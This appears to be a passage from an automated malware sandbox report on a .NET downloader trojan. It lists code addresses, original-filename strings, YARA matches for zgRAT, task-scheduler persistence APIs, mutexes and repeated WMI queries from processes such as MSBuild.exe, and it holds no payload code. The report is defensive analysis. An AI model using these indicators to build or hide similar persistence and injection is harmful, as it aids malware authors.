Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Code function: 7_2_05A30367 7_2_05A30367
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Code function: 7_2_05D2A148 7_2_05D2A148
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Code function: 7_2_05D2A2A8 7_2_05D2A2A8
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Code function: 7_2_05D2A580 7_2_05D2A580
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Code function: 7_2_05D2A46D 7_2_05D2A46D
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Code function: 7_2_05D2A43D 7_2_05D2A43D
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Code function: 7_2_05D2A687 7_2_05D2A687
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Code function: 7_2_05D2A62E 7_2_05D2A62E
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Code function: 7_2_05D2A183 7_2_05D2A183
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Code function: 7_2_05D2A1A9 7_2_05D2A1A9
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Code function: 7_2_05D2A138 7_2_05D2A138
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Code function: 7_2_05D2A338 7_2_05D2A338
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Code function: 7_2_05D4CAB8 7_2_05D4CAB8
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Code function: 7_2_05D4F6A0 7_2_05D4F6A0
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Code function: 7_2_05D4B040 7_2_05D4B040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 8_2_0615D990 8_2_0615D990
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 8_2_06140006 8_2_06140006
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 8_2_06140040 8_2_06140040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 8_2_0615D1B8 8_2_0615D1B8
Source: C:\Users\user\AppData\Local\Temp\fdyryi.exe Code function: 15_2_00007FF7C1060D41 15_2_00007FF7C1060D41
Source: C:\Users\user\AppData\Local\Temp\fdyryi.exe Code function: 15_2_00007FF7C106117A 15_2_00007FF7C106117A
Source: C:\Users\user\AppData\Local\Temp\fdyryi.exe Code function: 15_2_00007FF7C1061799 15_2_00007FF7C1061799
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Code function: 21_2_016658F0 21_2_016658F0
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Code function: 21_2_01661C20 21_2_01661C20
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Code function: 21_2_01665105 21_2_01665105
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Code function: 21_2_016658EA 21_2_016658EA
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Code function: 21_2_0166536A 21_2_0166536A
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Code function: 21_2_01665378 21_2_01665378
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Code function: 21_2_01661BF2 21_2_01661BF2
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Code function: 21_2_01661C20 21_2_01661C20
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Code function: 21_2_01662720 21_2_01662720
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Code function: 21_2_01662730 21_2_01662730
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Code function: 21_2_05860040 21_2_05860040
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Code function: 21_2_05862B67 21_2_05862B67
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Code function: 21_2_05860007 21_2_05860007
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Code function: 21_2_05C31CD8 21_2_05C31CD8
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Code function: 21_2_05C34498 21_2_05C34498
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Code function: 21_2_05C350B0 21_2_05C350B0
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Code function: 21_2_05C37363 21_2_05C37363
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Code function: 21_2_05C35F28 21_2_05C35F28
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Code function: 21_2_05C38A76 21_2_05C38A76
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Code function: 21_2_05C3758F 21_2_05C3758F
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Code function: 21_2_05C31CC9 21_2_05C31CC9
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Code function: 21_2_05C347E0 21_2_05C347E0
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Code function: 21_2_05C38AC0 21_2_05C38AC0
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Code function: 21_2_05C80040 21_2_05C80040
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Code function: 21_2_05C810D8 21_2_05C810D8
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Code function: 21_2_05C80367 21_2_05C80367
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Code function: 21_2_05F9CAB8 21_2_05F9CAB8
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Code function: 21_2_05F9F6A0 21_2_05F9F6A0
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Code function: 21_2_05F9B040 21_2_05F9B040
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe Code function: 23_2_00007FF7C1040D41 23_2_00007FF7C1040D41
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe Code function: 23_2_00007FF7C1041453 23_2_00007FF7C1041453
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe Code function: 23_2_00007FF7C10418CF 23_2_00007FF7C10418CF
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe Code function: 23_2_00007FF7C10414AE 23_2_00007FF7C10414AE
Source: C:\Users\user\AppData\Local\Temp\pjmskbbdr.exe Code function: 27_2_02EE22C9 27_2_02EE22C9
Source: C:\Users\user\AppData\Local\Temp\pjmskbbdr.exe Code function: 27_2_02EE573C 27_2_02EE573C
Source: C:\Users\user\AppData\Local\Temp\pjmskbbdr.exe Code function: 27_2_02EE1A15 27_2_02EE1A15
Source: C:\Users\user\AppData\Local\Temp\pjmskbbdr.exe Code function: 27_2_02EE110B 27_2_02EE110B
Source: C:\Users\user\AppData\Local\Temp\pjmskbbdr.exe Code function: 27_2_02EE5776 27_2_02EE5776
Source: C:\Users\user\AppData\Local\Temp\pjmskbbdr.exe Code function: 27_2_02EE1A56 27_2_02EE1A56
Sample file is different than original file name gathered from version info
Source: SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe Binary or memory string: OriginalFilename vs SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe
Source: SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe, 00000000.00000000.1391916020.0000000000B14000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameVngvwtlj.exe4 vs SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe
Source: SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe, 00000000.00000002.1443307685.0000000002F12000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameUxqoksruw.exe" vs SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe
Source: SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe, 00000000.00000002.1447665099.000000000459A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe
Source: SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe, 00000000.00000002.1447665099.000000000459A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameEfaybt.dll" vs SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe
Source: SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe, 00000000.00000002.1443307685.00000000031DC000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe
Source: SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe, 00000000.00000002.1443307685.0000000002EC0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameUxqoksruw.exe" vs SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe
Source: SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe, 00000000.00000002.1462651958.0000000007050000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameEfaybt.dll" vs SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe
Source: SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe, 00000000.00000002.1461796579.0000000005F90000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe
Source: SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe, 00000000.00000002.1443307685.0000000002F87000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameclrjit.dllT vs SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe
Source: SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe, 00000000.00000002.1443307685.0000000002F87000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilename vs SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe
Source: SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe, 00000000.00000002.1443307685.0000000002F87000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: q,\\StringFileInfo\\040904B0\\OriginalFilename vs SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe
Source: SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe, 00000000.00000002.1461192975.0000000005EE0000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe
Source: SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe, 00000000.00000002.1443307685.0000000003111000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe
Source: SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe, 00000000.00000002.1441853513.000000000109E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameclr.dllT vs SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe
Source: SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe, 00000000.00000002.1443307685.0000000003123000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe
Source: SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe, 00000002.00000002.1480296613.0000000004497000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe
Source: SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe, 00000002.00000002.1480296613.0000000004497000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe
Source: SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe, 00000002.00000002.1480296613.00000000042EC000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameQatvhs.dll" vs SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe
Source: SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe, 00000002.00000002.1480296613.00000000042EC000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe
Source: SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe, 00000002.00000002.1480296613.0000000004110000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameQatvhs.dll" vs SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe
Source: SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe, 00000002.00000002.1480296613.0000000004555000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe
Source: SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe, 00000002.00000002.1490428005.0000000005520000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameQatvhs.dll" vs SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe
Source: SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe, 00000002.00000002.1470593707.0000000002EB1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilename vs SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe
Source: SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe, 00000002.00000002.1470593707.0000000003038000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe
Source: SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe, 00000002.00000002.1470593707.0000000003038000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenametaskschd.dll.muij% vs SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe
Source: SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe, 00000002.00000002.1470593707.0000000003038000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: q,\\StringFileInfo\\040904B0\\OriginalFilename vs SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe
Uses 32bit PE files
Source: SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Yara signature match
Source: 22.2.AlgorithmType.exe.205312b0000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 22.2.AlgorithmType.exe.205312b0000.0.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 0.2.SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe.3f36b50.5.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 20.2.AlgorithmType.exe.1b81698e628.5.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 00000016.00000002.1915461122.00000205312B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 0.2.SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe.3f36b50.5.raw.unpack, bRjamkahGpNcHlBjdu.cs Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe.3f36b50.5.raw.unpack, bRjamkahGpNcHlBjdu.cs Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe.5f90000.12.raw.unpack, ITaskFolder.cs Task registration methods: 'RegisterTaskDefinition', 'RegisterTask'
Source: 0.2.SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe.5f90000.12.raw.unpack, TaskFolder.cs Task registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
Source: 0.2.SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe.5f90000.12.raw.unpack, Task.cs Task registration methods: 'RegisterChanges', 'CreateTask'
Source: 0.2.SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe.5f90000.12.raw.unpack, TaskService.cs Task registration methods: 'CreateFromToken'
Source: 0.2.SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe.5f90000.12.raw.unpack, TaskSecurity.cs Security API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
Source: 0.2.SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe.5f90000.12.raw.unpack, TaskSecurity.cs Security API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
Source: 0.2.SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe.5f90000.12.raw.unpack, Task.cs Security API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 0.2.SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe.5f90000.12.raw.unpack, TaskFolder.cs Security API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 0.2.SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe.5f90000.12.raw.unpack, TaskPrincipal.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe.5f90000.12.raw.unpack, User.cs Security API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
Source: classification engine Classification label: mal100.troj.evad.mine.winEXE@36/25@5/4
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe.log Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Mutant created: NULL
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Mutant created: \Sessions\1\BaseNamedObjects\dabbj
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:2932:120:WilError_03
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe Mutant created: \Sessions\1\BaseNamedObjects\9b6048d01894c73222f12c43ae5e9503
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:1696:120:WilError_03
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Mutant created: \Sessions\1\BaseNamedObjects\lancianera19
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:4576:120:WilError_03
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe Mutant created: \Sessions\1\BaseNamedObjects\1f21592b44725f9c29e8cf
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_twqyckxm.pyb.ps1 Jump to behavior
Source: SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.98%
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\fdyryi.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\NamedPermissionSets\AlgorithmType.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
